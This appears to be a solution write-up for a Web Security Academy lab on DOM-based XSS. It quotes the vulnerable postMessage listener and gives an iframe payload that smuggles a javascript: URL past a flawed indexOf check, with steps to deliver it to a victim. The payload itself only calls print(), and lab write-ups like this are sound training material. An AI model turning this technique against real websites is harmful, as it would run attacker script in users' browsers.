DOM XSS using web messages and a JavaScript URL
lab:https://0ae300350403b7c5803a262e000400bb.web-security-academy.net/
Solution
HII SEHEMU NDO INA WEAKNESS: [Control + U]
  <script>
                        window.addEventListener('message', function(e) {
                            var url = e.data;
                            if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
                                location.href = url;
                            }
                        }, false);
                    </script>

    1.Notice that the home page contains an addEventListener() call that listens for a web message. 
     The JavaScript contains a flawed indexOf() check that looks for the strings "http:" or "https:" anywhere within the web message. It also contains the sink location.href.

    2.Go to the exploit server and add the following iframe to the body, remembering to replace YOUR-LAB-ID with your lab ID: 
    PAYLOADS:
    ###################################################################################################################################
   <iframe src="https://YOUR-LAB-ID.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')">
    ####################################################################################################################################

   eg. <iframe src="https://0ae300350403b7c5803a262e000400bb.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')">

   3.Store the exploit and deliver it to the victim. 

This script sends a web message containing an arbitrary JavaScript payload, along with the string "http:".
The second argument specifies that any targetOrigin is allowed for the web message.
When the iframe loads, the postMessage() method sends the JavaScript payload to the main page. 
The event listener spots the "http:" string and proceeds to send the payload to the location.href sink, where the print() function is called. 




